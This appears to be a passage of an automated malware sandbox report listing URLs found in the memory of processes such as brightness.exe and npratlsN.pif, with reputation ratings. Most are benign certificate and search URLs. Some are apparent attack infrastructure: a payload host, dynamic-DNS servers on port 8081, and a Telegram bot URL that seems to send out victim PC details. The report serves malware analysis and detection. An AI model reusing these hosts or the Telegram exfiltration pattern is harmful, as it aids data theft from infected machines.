                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17npratlsN.pif, 00000008.00000002.3076785533.0000000028BA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D40000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029ACC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CCB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035515000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035434000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003525C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003540D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353BF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035656000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.000000002190C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000002.3078285306.0000000021BC6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A70000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://amazonenviro.com/245_Nsltarpnconibrightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://chrome.google.com/webstore?hl=ennpratlsN.pif, 00000012.00000002.3075519147.0000000020AC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://amazonenviro.com:443/245_Nsltarpnconbrightness.exe, 00000004.00000002.1853607956.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20anpratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://amazonenviro.com/245_Nsltarpnconubrightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://x1.c.lencr.org/0npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2447599727.000000002B08F000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFFA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086255438.000000002B092000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2446942695.000000002B087000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616470680.0000000023763000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://x1.i.lencr.org/0npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2447599727.000000002B08F000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFFA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086255438.000000002B092000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2446942695.000000002B087000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616470680.0000000023763000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallnpratlsN.pif, 00000008.00000003.2441941457.0000000029CA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D1B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CD3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AD2000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029AA7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B1C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003539B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035237000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000354F1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003560E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353C6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035410000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.00000000218E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021CBE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A76000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AC0000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.office.com/DzY#npratlsN.pif, 00000012.00000002.3075519147.0000000020AF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnpratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://checkip.dyndns.org/qnpratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://chrome.google.com/webstore?hl=enDzY#npratlsN.pif, 00000012.00000002.3075519147.0000000020AC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://chrome.google.com/webstore?hl=enlBnpratlsN.pif, 00000008.00000002.3076785533.0000000028C29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.verisign.PnpratlsN.pif, 0000000E.00000002.3095136706.00000000368D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://e6.o.lencr.org0npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3080226661.0000000032432000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616339150.0000000023771000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenpratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://x1.i.lencr.ornpratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.pmail.com0brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851010321.000000007EDDA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1898124389.00000000215FA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846267293.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899037932.0000000021850000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.drfalse
                                                                                  high
                                                                                  https://reallyfreegeoip.org/xml/npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028AF1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034281000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020934000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.office.com/npratlsN.pif, 00000012.00000002.3075519147.0000000020AF1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://sectigo.com/CPS0brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.iconpratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://checkip.dyndns.orgnpratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016npratlsN.pif, 00000008.00000002.3076785533.0000000028BA6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B41000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D40000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029B19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3080832543.0000000029ACC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029CCB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2441941457.0000000029D19000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035515000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035434000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003525C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.000000003540D000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000353BF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035656000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.000000002190C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021AE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 
00000012.00000002.3075519147.00000000209EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021BC6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021A70000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021D06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://amazonenviro.com/brightness.exe, 00000004.00000002.1853607956.000000000088D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://aborters.duckdns.org:8081npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://mail.irco.com.sanpratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
